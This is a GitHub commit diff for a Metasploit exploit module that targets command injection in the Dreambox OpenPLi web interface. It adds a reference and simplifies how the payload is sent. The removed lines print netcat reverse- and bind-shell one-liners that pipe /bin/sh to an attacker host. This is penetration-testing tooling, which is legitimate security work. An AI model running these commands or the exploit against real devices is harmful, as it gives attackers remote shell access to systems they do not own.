Skip to content

Commit 9366e3f

Browse files
author
m-1-k-3
committed
last adjustment
1 parent 0140caf commit 9366e3f

File tree

1 file changed

+3
-9
lines changed

1 file changed

+3
-9
lines changed

modules/exploits/linux/http/dreambox_openpli_shell.rb

Lines changed: 3 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -39,6 +39,7 @@ def initialize(info = {})
3939
[ 'URL', 'http://openpli.org/wiki/Webif' ],
4040
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ],
4141
[ 'EDB', '24498' ],
42+
[ 'BID', '57943' ],
4243
[ 'OSVDB', '90230']
4344
],
4445
'Platform' => ['unix', 'linux'],
@@ -51,7 +52,7 @@ def initialize(info = {})
5152
'Compat' =>
5253
{
5354
'PayloadType' => 'cmd',
54-
'RequiredCmd' => 'netcat-e generic'
55+
'RequiredCmd' => 'netcat generic'
5556
}
5657
},
5758
'Targets' =>
@@ -75,14 +76,7 @@ def exploit
7576

7677
uri = '/cgi-bin/setConfigSettings'
7778

78-
if payl =~ /bind/
79-
cmd = Rex::Text.uri_encode("mknod /tmp/backpipe p; nc -l -p #{lport} 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe")
80-
elsif payl =~ /reverse/
81-
cmd = Rex::Text.uri_encode("mknod /tmp/backpipe p; nc #{lhost} #{lport} 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe")
82-
else
83-
#this is for typical command execution ... cmd/unix/generic
84-
cmd = Rex::Text.uri_encode(payload.encoded)
85-
end
79+
cmd = Rex::Text.uri_encode(payload.encoded)
8680

8781
vprint_status("#{rhost}:#{rport} - Sending remote command ... \nCommand: #{cmd}")
8882
vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\n")

0 commit comments

Comments
 (0)